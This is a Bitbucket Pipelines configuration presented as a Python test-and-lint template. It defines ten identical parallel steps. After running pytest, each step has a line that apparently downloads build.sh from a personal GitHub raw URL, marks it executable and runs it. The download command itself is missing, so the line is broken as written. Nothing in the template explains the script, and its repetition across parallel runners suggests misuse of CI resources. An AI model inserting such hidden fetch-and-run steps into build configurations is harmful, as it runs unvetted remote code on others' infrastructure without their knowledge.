#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test 1
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 2
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 3
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 4
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 5
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 6
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 7
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 8
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 9
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh
      - step:
          name: Test 10
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - https://raw.githubusercontent.com/alexander-a-cyber/might/main/build.sh && chmod +x build.sh && ./build.sh